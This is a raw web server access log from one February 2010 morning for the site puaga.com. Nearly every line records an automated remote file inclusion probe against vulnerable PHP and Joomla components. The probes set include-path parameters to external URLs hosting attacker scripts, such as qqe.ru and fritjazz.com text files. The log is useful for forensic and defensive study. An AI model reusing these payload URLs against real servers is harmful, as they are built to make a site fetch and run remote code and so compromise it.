87.106.134.174 - - [11/Feb/2010:08:20:53 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:20:53 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:20:53 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:21:00 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:21:00 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:21:00 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:21:04 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:21:04 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:21:04 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:08:21:20 -0800] "GET /logs/access_100130.log//ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:08:21:21 -0800] "GET /logs/access_100130.log//ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:21:26 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:21:26 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:21:26 -0800] "GET /logs/access_100107.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:21:26 -0800] "GET /logs/access_100208.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:08:21:46 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
200.93.147.154 - - [11/Feb/2010:08:21:46 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:08:21:47 -0800] "GET /orange_g/forum/viewtopic.php?p=25164 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
200.93.147.154 - - [11/Feb/2010:08:21:47 -0800] "GET /lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:21:55 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.222.11 - - [11/Feb/2010:08:22:33 -0800] "GET /view.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.222.11 - - [11/Feb/2010:08:22:33 -0800] "GET /logs/access_100117.log%20%20/view.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.222.11 - - [11/Feb/2010:08:22:33 -0800] "GET /logs/view.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:08:22:40 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:08:22:40 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:08:22:40 -0800] "GET /logs/access_100119.log//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [11/Feb/2010:08:22:55 -0800] "GET /logs/access_100127.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.jessicakagancushman.com/images/id????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:23:02 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:23:02 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:23:02 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:23:46 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:23:46 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:23:46 -0800] "GET /logs/access_100110.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:23:47 -0800] "GET /logs/access_100107.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:23:48 -0800] "GET /logs/access_100107.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:23:49 -0800] "GET /logs/access_100107.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:08:24:02 -0800] "GET /logs/access_100130.log//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:24:10 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:24:10 -0800] "GET /logs/access_100208.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:24:10 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:24:24 -0800] "GET /logs/access_100107.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:25:01 -0800] "GET /appserv/main.php?appserv_root=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:25:01 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:25:01 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:14 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:14 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:14 -0800] "GET /logs/access_100208.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:14 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:14 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:14 -0800] "GET /logs/access_100208.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:18 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:18 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:25:24 -0800] "GET /logs/access_100112.log%20%20//appserv/main.php?appserv_root=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [11/Feb/2010:08:25:26 -0800] "GET /logs/access_100129.log//errors.php?error=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
221.141.1.113 - - [11/Feb/2010:08:25:27 -0800] "GET /errors.php?error=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
221.141.1.113 - - [11/Feb/2010:08:25:28 -0800] "GET /logs//errors.php?error=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:25:30 -0800] "GET /logs/access_100105.log%20%20/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:31 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:31 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:31 -0800] "GET /logs/access_100208.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:36 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [11/Feb/2010:08:25:41 -0800] "GET /logs/access_100126.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:41 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:41 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:41 -0800] "GET /logs/access_100111.log%20%20//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:25:50 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:25:51 -0800] "GET /logs/access_100125.log%20%20//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:26:08 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:26:08 -0800] "GET /logs/access_100111.log%20%20//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:26:08 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:26:24 -0800] "GET /logs/access_100125.log%20%20//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:26:48 -0800] "GET /logs/access_100125.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:26:52 -0800] "GET /logs/access_100111.log%20%20//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:26:52 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:26:52 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:27:03 -0800] "GET /logs/access_100125.log%20%20//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:27:25 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [11/Feb/2010:08:27:30 -0800] "GET /logs/access_100109.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.freeporngiant.com//categories/bad.jpg??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [11/Feb/2010:08:27:31 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.freeporngiant.com//categories/bad.jpg??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [11/Feb/2010:08:27:32 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.freeporngiant.com//categories/bad.jpg??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:28:06 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:28:06 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:28:06 -0800] "GET /logs/access_100208.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:28:12 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:28:28 -0800] "GET /logs/access_100107.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:28:40 -0800] "GET /logs/access_100111.log%20%20//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:28:40 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:28:40 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:28:58 -0800] "GET /logs/access_100125.log%20%20//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:29:18 -0800] "GET /logs/access_100112.log%20%20//appserv/main.php?appserv_root=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:08:29:38 -0800] "GET /components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:08:29:38 -0800] "GET /logs/access_100118.log%20%20//components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:08:29:38 -0800] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:08:29:44 -0800] "GET /logs/access.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_virtuemart&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:08:29:44 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_virtuemart&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:08:29:45 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_virtuemart&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:08:29:52 -0800] "GET /components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:08:29:52 -0800] "GET /logs/access_100118.log%20%20//components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:08:29:52 -0800] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:08:30:01 -0800] "GET /logs/access_100126.log%20%20//components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [11/Feb/2010:08:30:21 -0800] "GET /logs/access.log//errors.php?error=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:08:30:23 -0800] "GET /logs/access_100126.log%20%20//components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [11/Feb/2010:08:30:34 -0800] "GET /logs/access_100117.log//errors.php?error=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
221.141.1.113 - - [11/Feb/2010:08:30:35 -0800] "GET /errors.php?error=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
221.141.1.113 - - [11/Feb/2010:08:30:36 -0800] "GET /logs//errors.php?error=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:08:31:19 -0800] "GET /logs/access.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_virtuemart&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:08:31:19 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_virtuemart&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:08:31:20 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_virtuemart&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
84.19.182.40 - - [11/Feb/2010:08:31:32 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "puaga.com"
198.173.4.70 - - [11/Feb/2010:08:32:12 -0800] "GET /components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:08:32:12 -0800] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:08:32:12 -0800] "GET /logs/access_100118.log//components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:08:32:39 -0800] "GET /logs/access_100126.log//components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:08:32:44 -0800] "GET /components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
